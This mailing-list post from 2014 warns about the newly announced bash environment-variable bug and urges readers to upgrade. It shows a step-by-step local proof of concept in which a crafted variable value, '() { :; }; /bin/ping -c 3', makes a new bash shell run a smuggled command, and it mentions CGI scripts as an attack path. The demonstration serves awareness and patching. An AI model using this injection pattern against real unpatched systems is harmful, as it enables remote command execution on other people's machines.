[colug-432] Newly-announced bash security hole

Rob Funk rfunk at funknet.net
Wed Sep 24 19:46:13 EDT 2014

Big bug announced today:

If you haven't patched your bash today, check this out:

1. Start a new bash subshell.
    $ bash
2. Export a new specially-crafted environment variable:
    $ export FOO='() { :; }; /bin/ping -c 3'
3. Start a new bash sub-subshell (under the first subshell):
    $ bash
4. Watch bash ping your machine:

PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.114 ms
64 bytes from icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from icmp_seq=3 ttl=64 time=0.093 ms

--- ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.093/0.102/0.114/0.014 ms

5. Exit the inner subshell.
    $ exit
6. Exit the outer subshell.
    $ exit

7. Imagine what could be done if a malicious person could specify what's in 
environment variables when your system starts bash.

8. Hope you don't have any bash scripts triggered by network actions, e.g. 
CGI scripts.

9. Upgrade bash.

Rob Funk <rfunk at funknet.net>

More information about the colug-432 mailing list